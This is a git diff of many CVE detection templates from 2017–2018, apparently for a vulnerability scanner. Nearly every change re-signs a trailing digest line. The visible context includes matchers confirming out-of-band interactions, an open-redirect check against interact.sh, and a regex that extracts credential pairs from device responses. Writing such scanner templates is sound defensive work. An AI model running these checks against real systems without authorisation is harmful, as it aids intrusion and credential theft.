--- a/http/cves/2017/CVE-2017-7615.yaml +++ b/http/cves/2017/CVE-2017-7615.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502206bebfaa70f2716d1cfaa8fea65c45df0f6bdf69b9c826ff42726fac53c5d1fff022100e826c9646b3e4b0948ba62639682e9f2e4662adcb6d454497f2588d639a6f654:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206f29d3d4ed64a1770f4bb2bb4c92632fb64a6c13cb17447f491ee5e4be4fc2ce02203188186df51d07cb8e8ab67343d0f99edaa63dd01999954ef2b68676b240223b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml index d648f7b861..9ea71c0274 100644 --- a/http/cves/2017/CVE-2017-7921.yaml +++ b/http/cves/2017/CVE-2017-7921.yaml @@ -42,5 +42,4 @@ http: part: header words: - "application/xml" - -# digest: 4a0a00473045022061f4837f898898c09bbfa86c9eb864e78c13248a8cfcc78e29a1d60165e00f7c022100be38345ba0116298a0fb6b99fd3aa6da0a64813ba0919ff3e12a94a71f9af213:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206b23dd98af0ed13c7e68f61d232769aa63ac3e836fe405c2d468aa770dac041e022100fb32e124198a5be566787e4c23c57396f61402db16dbafe1a115ac0c838d0f2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7925.yaml b/http/cves/2017/CVE-2017-7925.yaml index 104a8cf9d3..c381bb5d7c 100644 --- a/http/cves/2017/CVE-2017-7925.yaml +++ b/http/cves/2017/CVE-2017-7925.yaml @@ -45,5 +45,4 @@ http: group: 1 regex: - 1:(.*:.*):1:CtrPanel - -# digest: 490a0046304402200a1b60e6d21b374fe6389997edde81116098255e4cb893ee1fcd648e0d17ac0e02205c41f7c5ebb6d7a5e9ab3e569d16c092a186d609dc252adffac6bad9a3404124:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ee91ec8810f3a5106b581c63f8755e033b46bb64eabccf6402656042c8b8b54c022077202a1493d03e4358f9a31f7d12f58ff81c28dbb952848c800af1749b143037:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-8229.yaml b/http/cves/2017/CVE-2017-8229.yaml index 55578ee202..a84301663b 100644 --- a/http/cves/2017/CVE-2017-8229.yaml +++ b/http/cves/2017/CVE-2017-8229.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220576b726d21ea29a57d5f52aa1086a1f4e52ae5524fdfe23edb5356347592ceae022008f7c9466813c60d5945182df004e068d356f50ea774f602a8c5c5e20bb80308:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200bc490b0ec028e15f002ef885f81251f2fc4de2516ff5953dc9663031e3f1538022026da4726d1c6766aca081bb0f96d5919d73963b8b25f52ab69be0954ec149736:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml index 3aaf4d4900..274627a39b 100644 --- a/http/cves/2017/CVE-2017-9140.yaml +++ b/http/cves/2017/CVE-2017-9140.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c73b58024fffaa5b554f88a0fa681ba0de1870227af0ae09fbd213d423fe9b4202202029e948f4e8e9b8ebe6c458cc01c924ac8c97eca7f4d669bce75cb55fb7434b:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200fc097160ebec0695a303948967fd73ebd39eb086fd9242ae5ec4ac0b9a6f93202204bd7e97f878d5b94cc47ea2900b2c2db5f6f1fdf5cafdbce4e8448928921f8af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index 84b347692d..d28104c279 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100e264735d68337bed6c28319f086fb55bec7983cac03ba2fc2c39c78e59041c4a022100d089992869e000049ae8bdcfacefd1ed8ebd7e944f19cfccca34fc371f400a28:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202bd3c45d5631e6b07c4f6a08f0765fdc563ded40657f50a8922c84db736845b402202ae1f2ceb01bd6706cc8f95b3ac7857e94047cb17b6c056a1a4143822f58586f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index 0ffadaa019..5e25b288fa 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -49,5 +49,4 @@ http: - "contains(body, 'extensions')" - "status_code == 200" condition: and - -# digest: 4a0a00473045022100e251184a92cb641395423b3db02ada40f084f90ffcbb2dce1e7d7115ff364246022062b58cc29a42a4b72f550f973a4f799082c8c0ad0f9d5041565fa12260f43db8:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d9dbcad2f5f1fe235b20713320a4fa7cd3877675580b0a1ba9c1c69b93a2bb41022006cc876bc42b34beb4d1b9c2d3b23b7fe3824cefd8b193e216c31477d2333d3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index 8b54a9e0a9..a2a852374c 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -39,5 +39,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# digest: 490a0046304402205e0b1af5fca3c1ed1c3b48b2420cb9bb8f17c287fadf55738d5737a63f177fcd022037283b088cc29d975862afe9f8c49d7c11a161c29023d8a52f6672f8db4ad1a3:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022070385e14e27b0040919bc19259648dbf71e7a62c89f074451c61f9287d81e196022040f201067e9b17d47a32ce8cc85f9298eea0e1dec3eae31657f6e3423bbb20ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml index 63c73867e5..141057cbcf 100644 --- a/http/cves/2017/CVE-2017-9822.yaml +++ b/http/cves/2017/CVE-2017-9822.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 404 - -# digest: 4b0a00483046022100aba7a02994d3d48d5dd62c96e2265a815111645c71edbf6472ae16029a17f73e022100de28eb4b8442f07f694174e381177cb654844cdb9a8ee1c17917c571695c32dc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203ffc4a1ca152e7e553f7ff23657cfc8e542c112721c98f8629e2e3d8530f4e2b022100c607a1c0e77f255e371e5f317ab4c73f92401ede14dc3affd978e8e6a632d1e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml index af075779e3..10fca549df 100644 --- a/http/cves/2017/CVE-2017-9833.yaml +++ b/http/cves/2017/CVE-2017-9833.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201d2f77be8a407adf7d0bf2a1b91b2dc68026a247e2cc014809e26b4c814eb360022100ee34af58870f06a9a7ea79b59a9d9f9c3cddc070099886625ac48d14ca611a8e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022040283aa74407b722d51168438fd8cdf08acd1e86a953f486faf7ca89cf44f9d00221008d817cc1dc2cf5f8f19dfff6227c8e1457770e9a6ea0b9206eff58e6b1b70dcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9841.yaml b/http/cves/2017/CVE-2017-9841.yaml index 32e27784cd..b0b7471242 100644 --- a/http/cves/2017/CVE-2017-9841.yaml +++ b/http/cves/2017/CVE-2017-9841.yaml @@ -76,5 +76,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008b906a849d65142768588af417df59d33dfd98e7e6362ae3a473dd8db69dbb940220095aa42620777b4016e60583b1eb228a4517862d0d180b7bfa6de6699bee0e34:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201fb868772f37924b2619b2c5096f849aaea9a93e419c5cffe45d157ee0203663022100d8ada169b76859b7bba2323238c35bdaa17bcc1c0c91fa09ede731a17d6869c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index 77e3bc2f95..db7ad17842 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100b1f0a5f7d83202d881b4d4b89945be030cd049bbeb89a56876d4405398784c4c022100af4ec0a400f09c05e6dcb6b77532e58f96acf86e24abec2d56c15e9fe1219927:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220617453a7ef04a37efa93d59ae215776eeaf30c56de20e09e220108f523e9d68e022100ffd3943f29998d00d43ada530ed189651ac3b97bd7e85c04887931176e526883:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-0296.yaml b/http/cves/2018/CVE-2018-0296.yaml index 76488cccba..c6ee2b980d 100644 --- a/http/cves/2018/CVE-2018-0296.yaml +++ b/http/cves/2018/CVE-2018-0296.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f57971ed4c5786c3c16c7c469a381344577e139c3c865a860ee96bcf4b639ac9022100fc334deae4d18ed455af2db5147fa2062bee2bc7e40479e0e55a9644c1120c6d:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044021f0c46812b6e282b29f87d446231fe88f28b2b1ed0cef2104768df999417c42b022100bd6bbf77750d2db7ccb0c2da0b55ffef52fe939438b441ecaa605fd139a90bcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index 1920157ec5..ac25139fbb 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502205906ea127fcdfd7d636d12b3844ee086b2c0af981e02b403ee92ec4c1f4ac130022100b6eabf55620bd89bed094edac9b259119052030047176d6a01c082a2a84d1e69:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220056f339e55cf8f6f00a71958e0a17cdd3d21d8306dde2c75a6592a53faff769b022016562bcbfaee1974e6cc7dc7248c1b0d4d95ef1b1b619a285d7bd0ec42bbbcc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index 3a179b39ca..b4b3e20467 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022012446a4d6a140517f03b5c3197743ed1d7f6d7a54c4a86119837959189db31230220190ffed858bfa53517717ed6cefb0045c76ff71b930aa44e158ef35c4ef816d7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220620d257fc1690c84c97590b491f5259223182f7d1ebe06671c5dcf4beb1ce44902210093fbbd904a948949a71c20017c376c40df33feefee143d2ab79728c6bcf3187d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index 508959a018..8a7ef0e803 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -68,5 +68,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502205b7f0adb914a0f401243ee4b45c5d69ada3f0329227eb06fe7d90cb28affc43b022100cee55b24d80b742e5bd6dedc492c593a69157d2f272b61a42885bca0f8c102a1:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c8701176e32eb21b9647898b9f2dcdabaa94ec59d1c3823ad39c41ebf956c97902210098297f7fba90a2b38dea7c1fd6b9f262a07581aea89e87b0b9539dcf15733e42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000600.yaml b/http/cves/2018/CVE-2018-1000600.yaml index ee8d4f1d8d..5a79142406 100644 --- a/http/cves/2018/CVE-2018-1000600.yaml +++ b/http/cves/2018/CVE-2018-1000600.yaml @@ -38,5 +38,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# digest: 4b0a00483046022100fa61afd8c8c0bf9b0f4ca61420806d3fd77596dfd659c2cea99d59fc504f7eee0221009eee90563b7dca74b5a5e78c1822fd0c70fbc88f263008b38e952d679de4227c:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206012f2a093a3e752e5143308a9c312c574a5a4772b52ed218ddfaab1eafca960022077722e79a97941812d851a22b6fd482cd6114486fb5701484fad7f3a0dfa07ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index ac14710f3e..00f226009c 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -39,5 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 4a0a00473045022022b328c51fe1f56632ca3f6566ec43fe5c95b895618f48f9364bbbd3ed894d1e022100b4c9496886fee621319bfbb2d627a9fa6c1c8b161aff15c326e9d6d18e7435d6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022078991570f9d7dda34436eaaa294dc92a4b8ff34a6f2e95172d61dacabaeda007022100d66e9991586f00e8a8789786b6490359e6b51add46fd41bd6c560f5a5e265f80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index 67ba56f61e..6a167889f4 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -64,5 +64,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c2dd9cdf54903bb5f8094ccb902ba6e608fb223d9327aa9997aa8e3a967c3ef90220373cf58cff392b05835497aa96a174e297d193be162ee25bbc78bdfc7244dbc8:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bb07bb7423fc465561feb398f7d8700cff2e208b6ec64415b54147c15bca0659022100b2c2b64e68fc2e064b179eece003714077db454b50cc639efa9b96e14e0ceb56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index 03eec686e5..b9461f0857 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c0a382d0f5454963229dc9518ae7241dbc744d37333890cc1e18edcff5901815022100970d91f7c4e96a5e241d673ef4ce8a435cdebcd3f745fdd2bba0e9833d9922ab:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206955d25054fb593168a1a6161bffe27e27342340f5c21ad60c61c4c203622902022100b825a374b88a66ea9b40746c81e9dc3a2a63a41d237b8d5ee391fda71c905d6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10093.yaml b/http/cves/2018/CVE-2018-10093.yaml index 666bc69a30..c50761de49 100644 --- a/http/cves/2018/CVE-2018-10093.yaml +++ b/http/cves/2018/CVE-2018-10093.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502207675e442f920358489108958759aa50ba852e318e8ebadd488289ef4c0898f64022100fbcbee5366b766f0c8d7eab8fad28a956ddd9b6c5790ae94ef916d6bfcf8f538:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207c154c0a9b59ed30738d255366fd804a6bfcb48efcb13c9d96351681a28ff2ea022100adc9395d0b30603379825a05a39ff982d49e0e26bf9d0294094c34508ad19845:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index 6b1bddf650..5da32d49d8 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a835238b2ede39ca57599040a2303563294dc4fe00fc12c8226338ee41dd8c86022003c35d42439dcc8cea23cca17858a4056a790904e1fecd81c2d075d512a2d830:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100dd19f4172b20c335198f61ef901d72796aed4740257b092294617b59e0d860ea022100bd67c34dde9904bce0348841cb6e5f3686cd982ca211f8711190d61cd6f71fa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10201.yaml b/http/cves/2018/CVE-2018-10201.yaml index 7d9fe8d7f3..0389c3208e 100644 --- a/http/cves/2018/CVE-2018-10201.yaml +++ b/http/cves/2018/CVE-2018-10201.yaml @@ -44,5 +44,4 @@ http: - "fonts" - "extensions" condition: and - -# digest: 4a0a00473045022100ad579f22d778f50d04f25e985318526dcc460ffa358550846103a8bea45c2eac02201e19025a1b855033cde5cd59e191d53f0b5a06d71087b134ae1e8c9cf255f2d0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022018a9f9a29865727fa6897da95fe391357518956b631a1a5d843bd787fdf3db320221008b5f6d5c4685ec7ebbb5230da69f1eae1e939206d74af6328181a977cbedb36c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index 466f1e4c66..e2c202d4b7 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502204c93bb380574223885bfe06bf35c3a5d9cf05117266ad3fdfb014a1f403edde0022100de34f294af2d812182dae923029092950c1cdff17c10d1bd375127d2a774d8cf:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210081c9e6b2de1ddf845fb977b1b790fb50e6fac3fdb4c8e911f5d495c57fd75000022073a357453e7172b7939c03a1657f1acaed7491b65dd6e766a7317d2dd0003430:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml index ccefd3232d..26a9b9fda4 100644 --- a/http/cves/2018/CVE-2018-10562.yaml +++ b/http/cves/2018/CVE-2018-10562.yaml @@ -54,5 +54,4 @@ http: part: interactsh_request words: - "User-Agent: {{useragent}}" - -# digest: 4a0a0047304502210081e74ae80e7aed2cced08439a2780ad88a9b7f09b907d8ceb24f5fb2548e6837022032a9246fe2973294140526948d68172190283dbd1432e46f965674425b074402:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022044f49deaf1283b93e9296be89ed1689f839786a467b77611567bb33d4d108dfc0220322ff2891b162d98318e52b60ca9f980845ae24bd44331a6f3fe7cdc0a21bde1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10822.yaml b/http/cves/2018/CVE-2018-10822.yaml index 3bc441b422..8e9d8b737c 100644 --- a/http/cves/2018/CVE-2018-10822.yaml +++ b/http/cves/2018/CVE-2018-10822.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402206d3df34161c363c83a11053b253e09c3bb471382dfedfd8a07981c7614be8bd902200919704b9b532d3787c7dd04354a23bcca1272904f2c0d53b3bf55db534a5cc2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204bd7868e960a730d304e40e641ded8e58b395d7a54f41cbda7ea816725fa59fd022100c0348fe153e939d549a054df6ae1af5581e6bd602dc88e66e74396baa17b20c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index 936dd14902..fd2a2ad3e6 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d3fd11a6c592ca06093190d9d5197d800e5547448e4fffb6eea51ad21c810ccc022100dcfc9d6e5752ecf828584d37862fa577ad8950e8cef5e66ab904cfb8490d9861:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022066a35fc3241dcb9090fa9c5d781950740531579ffe2ff67ac92345555ef02b350221009fcdc2012a56f3a0d7278fb67f010b3040cd8c911b26b8e54d7e4f0837168dbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml index c8945daeeb..f833acb459 100644 --- a/http/cves/2018/CVE-2018-11227.yaml +++ b/http/cves/2018/CVE-2018-11227.yaml @@ -56,5 +56,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ee0b17a26e299ef2aefa6ec84a2d532dc994f953f68a823fcdba4277b9d292b5022012e57c30f411072bb4f3091deee04f8e79b7e282dac389a11c496d7f7f6693fa:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f00dabc88c7d11e3cc810c9ba58e6bb792c5b4ce12048e42917a3bb4b45b57ad022100aba250f9c5b9bcc9b87c677393bdeddfb3db622b44cd790aaa6a4d542c17d674:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11231.yaml b/http/cves/2018/CVE-2018-11231.yaml index f9189fd077..e8966fc0d0 100644 --- a/http/cves/2018/CVE-2018-11231.yaml +++ b/http/cves/2018/CVE-2018-11231.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402201a48139fe82acef57ab9ff31749df0b70c0ac9392d414c4065a03c1c2a65926002203adfd14dbe25553ff6e82a2f188df8b43f8f127d4211caf38e4f179bcd18708f:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220655a8fb1f9000fac84ea93804eeba7d4c556d5df506d18c5ef3bea9c63997f6202202ab2f3023a843bc797e5e5ab105743190d269fff8680a92f7cc8516869d21459:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index a06616fa9b..1bb618efc5 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -69,5 +69,4 @@ http: - 'id="csrf" name="csrf" value="(.*)">' internal: true part: body - -# digest: 490a0046304402204c5ec898a45cabf2908ea777aa6ebce97025d31dc7a780c7704832c90a59e848022059c45ba2f33649e428ed4dbebfa0b86b8924dba3eb05c587169a71286191e2da:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bc5ce186cd693e2a79961ec6a8eb691a9794bdd094e342a5daaf3a39d891df35022100baf85515fab07accf32d6f5f1f56b34e6480cc8de2f011f940ef290afee2e25d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index 65ffd907c8..ccead19278 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210098b3928e6c9a7994fc224090fd21a7563c8fc52c987d88c87a0120eefcb4613e022053073641040dd2aae670aed2981c2681bffbb508e0107aff22d11dfcfa9b573b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022003c11c386bdfe86631eb8e447b18a4bd52ccd7cd266c91b5644ff6d94d643ac0022100ab1fcd5de074caf3ceb361eb464d2da1b8a505d63ac14ce383b6cb07c158ed2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index 628682d59b..970570f5e3 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml @@ -45,5 +45,4 @@ http: negative: true status: - 404 - -# digest: 4a0a00473045022100a068c35f19023e4c7fe17d31ec3f3079119b916e86c455951a99e41e1032edb5022028aafaa81d80266a80d002ad8240941e08864f90af57b298262601431d92a94a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ea374146f0069d51fe87f5de54103cf188f704cc815872578e947f4834b84f3a022059b94572899161abc3ba831a96c4639d4a6eeb76947a8cc070a6626ab05b50b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index 37d81e9d39..6d61b37129 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402206c7771215946c2cb6798e5b6f3f3b39e63b4bc4803ba2a3ec90d8c70fcae214b02205f293b4024cb2e9be981ac0c7e27b8b7635f9342cce777f9e20e36f64727a953:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202b2b67c9848bea10c74c857aceaa7dbc773ff45a7810cd46776566cd046d8522022100a8af0de799afe0ea939cee8abc3bd3100de8ddea79a57c650f575cc1dbe72d06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12054.yaml b/http/cves/2018/CVE-2018-12054.yaml index df452f5330..6a00939359 100644 --- a/http/cves/2018/CVE-2018-12054.yaml +++ b/http/cves/2018/CVE-2018-12054.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502206954e9afa3028819b0738e535dae23cf9ce4c5b0f766051c2ae42427685b4eec022100bb4808125c04f8aac533339d54989eebab6b5ff0313a411fcebc77115ce95602:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220736d80e2166dcea8ac03122e997d30e852294357942d3865e190932fee5a717902204d430c61b1f2a26a20d5deb7663e9c39eeac8c9b4b1545b473178038dff8f20c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1207.yaml b/http/cves/2018/CVE-2018-1207.yaml index 66bdf47acb..4571852d1c 100644 --- a/http/cves/2018/CVE-2018-1207.yaml +++ b/http/cves/2018/CVE-2018-1207.yaml @@ -40,5 +40,4 @@ http: part: response words: - "calling init: /lib/" - -# digest: 490a0046304402201fa565eeabddd5b087c8175cee3ddf78e173f68aca6c06d0f19b0d1df1acedc902200c9e04063f230fc2ddfe40f78e450f397c333bb6427ebfe2dc61b9933955d3a5:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008b5847f6f5868e95c0bf9b3f983541cc52a69bb4e48b9afb569f50b1ffe7b192022100aa6dd58242c2c6b889b2f2a611b68251b0da454d8f4f99b306d8b1ba8e51fb95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml index b7941c4081..1666a48b5e 100644 --- a/http/cves/2018/CVE-2018-12095.yaml +++ b/http/cves/2018/CVE-2018-12095.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022040b6e4d455bd8c71f8c9b681accec14925c0b1d4cc75a0a64909864ceef21f41022100d91cba53fac0cbdacdc4e3286aded32d99682b90f944181bc68e34bd071f128e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202b29becec2941f4f524ed844ab8c7f4461c1060672509421cff911eed64c875b022100a9185c646811fa488c8714ed1afb9b59f653f504915d7647b4d8b6e7f23f0ea7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index 1f7387251f..95bdc64bb5 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -45,5 +45,4 @@ http: regex: - '"version": "([0-9.]+)"' part: body - -# digest: 4a0a00473045022100c08f7bb4abf4fd9d0e571eb28bc1fd68a965efa3df655922fec15b429084848a022016e9d698748f0e5e885df3e81e7a2d5253b309bb29f3c7e4957e7f99fde7289d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e563341169178e5ca0b633f9f47489a118ee5bbd300f4a44f5e32bf9687bac9a02210089558d0353fe060a73c2d958c1d265af5fd7d2a3efb169ff0c30fd0dab16df51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index aceefdfebf..6b50ea9a51 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -34,5 +34,4 @@ 